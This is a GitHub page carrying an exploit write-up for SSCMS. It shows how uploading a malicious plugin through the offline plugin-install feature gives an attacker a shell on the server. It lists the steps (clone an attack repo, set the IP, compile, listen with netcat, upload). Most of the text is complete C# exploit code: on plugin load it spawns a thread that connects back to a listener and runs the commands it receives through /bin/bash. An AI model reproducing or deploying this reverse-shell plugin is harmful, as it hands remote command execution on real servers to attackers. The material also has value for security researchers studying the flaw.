Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Vul Function Point

Plug-in offline installation function, Rebound Shell is realized by making malicious plug-ins.

图片

Plug-in Make

git clone https://github.com/Richard-Tang/SSCMS-PluginShell.git

Change the IP address in “Startup.cs” File, Compile using VisualStudio tools.

图片

图片

compression files

图片

GetShell

nc -lvvp 8889

图片

upload plugin

图片

Reverse Shell successfully obtains permissions

图片

Principle

You just need to write code that conforms to the plug-in format and invoke the corresponding function when the plug-in is installed to trigger Exploit Code。

using Microsoft.Extensions.DependencyInjection;
using SSCMS.Advertisement.Abstractions;
using SSCMS.Advertisement.Core;
using SSCMS.Plugins;
using System.Diagnostics;
using System;
using System.Text;
using System.Net.Sockets;
using System.Net;
using System.Threading;

namespace SSCMS.Advertisement
{
    public class Startup : IPluginConfigureServices
    {
        public void ConfigureServices(IServiceCollection services)
        {
            ... <--- ExploitCode
            
            services.AddScoped<IAdvertisementRepository, AdvertisementRepository>();
        }
	}
}

Exp

using Microsoft.Extensions.DependencyInjection;
using SSCMS.Advertisement.Abstractions;
using SSCMS.Advertisement.Core;
using SSCMS.Plugins;
using System.Diagnostics;
using System;
using System.Text;
using System.Net.Sockets;
using System.Net;
using System.Threading;

namespace SSCMS.Advertisement
{
    public class Startup : IPluginConfigureServices
    {
        
      public void ConfigureServices(IServiceCollection services)
      {
         ThreadStart childref = new ThreadStart(reversShell);
         Thread childThread = new Thread(childref);
         childThread.Start();
         services.AddScoped<IAdvertisementRepository, AdvertisementRepository>();
      }

		public void reversShell()
		{
			Socket socketshell = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
			IPAddress ip = IPAddress.Parse("172.17.0.1");
			IPEndPoint point = new IPEndPoint(ip, Convert.ToInt32("8889"));
			try
			{
				socketshell.Connect(point);
				while (true)
				{
					byte[] getdata = new byte[1024 * 5];
					int n = socketshell.Receive(getdata);
					string restr = Encoding.Default.GetString(getdata, 0, n);
					string command = restr;
					string resultok = willshell(command);
					byte[] senddata = new byte[1024 * 5];
					senddata = Encoding.Default.GetBytes(resultok);
					socketshell.Send(senddata);
				}
			}
			catch
			{
				socketshell.Close();
			}
		}

		public static string willshell(object command)
		{
			Process process = new Process();
			process.StartInfo.FileName = "/bin/bash";
			process.StartInfo.UseShellExecute = false;
			process.StartInfo.RedirectStandardError = true;
			process.StartInfo.RedirectStandardInput = true;
			process.StartInfo.RedirectStandardOutput = true;
			process.StartInfo.CreateNoWindow = true;
			process.Start();
			process.StandardInput.WriteLine("echo off");
			process.StandardInput.WriteLine(command);
			process.StandardInput.WriteLine("exit");
			string result = process.StandardOutput.ReadToEnd();
			return result;
		}
	}
}